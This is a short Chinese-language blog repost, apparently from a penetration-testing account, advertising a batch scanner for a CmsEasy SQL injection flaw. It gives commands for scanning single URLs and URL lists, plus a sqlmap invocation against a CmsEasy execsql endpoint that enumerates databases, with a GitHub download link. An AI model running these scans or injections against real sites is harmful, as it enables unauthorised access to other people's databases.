CmsEasy | SQL注入漏洞批量扫描工具

admin

102777
文章

87
评论

2023年4月20日02:33:25评论144 views字数 423阅读1分24秒阅读模式

0x01 工具介绍

CmsEasy SQL注入漏洞批量扫描工具。

0x02 安装与使用

1、单个url测试

python3 cmseasy_sql_scan.py -u http://127.0.0.1:1111

2、批量检测扫描结束后会在当前目录生成vuln.txt记录存在漏洞的url

python3 cmseasy_sql_scan.py -f url.txt

3、sql注入执行

python sqlmap.py -u "https://xxx.xxx.xxx.xxx/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5" --dbs

CmsEasy | SQL注入漏洞批量扫描工具

0x03 链接下载

下载链接

https://github.com/MzzdToT/CmsEasy_sql

原文始发于微信公众号（渗透安全团队）：CmsEasy | SQL注入漏洞批量扫描工具

左青龙
微信扫一扫

右白虎
微信扫一扫

CmsEasy | SQL注入漏洞批量扫描工具

SpringBlade list SQL注入批量检测工具

SpringBlade error/list SQL 注入漏洞(附工具)

SharpADWS - 滥用 ADWS 协议枚举 Active Directory

一款专注于spring框架的渗透测试工具

渗透必备悬剑武器库5.04版 .

badKarma：一款功能强大的网络侦查GUI工具

Deswing ：图形化Java反序列化利用工具，集成Ysoserial

【红队】一款集成多个测绘平台的图形化工具：Search_Viewer

工具分享-微信多种凭证泄露检测工具(尝鲜版)

mRemoteNG自动化解密工具

发表评论

在线咨询

微信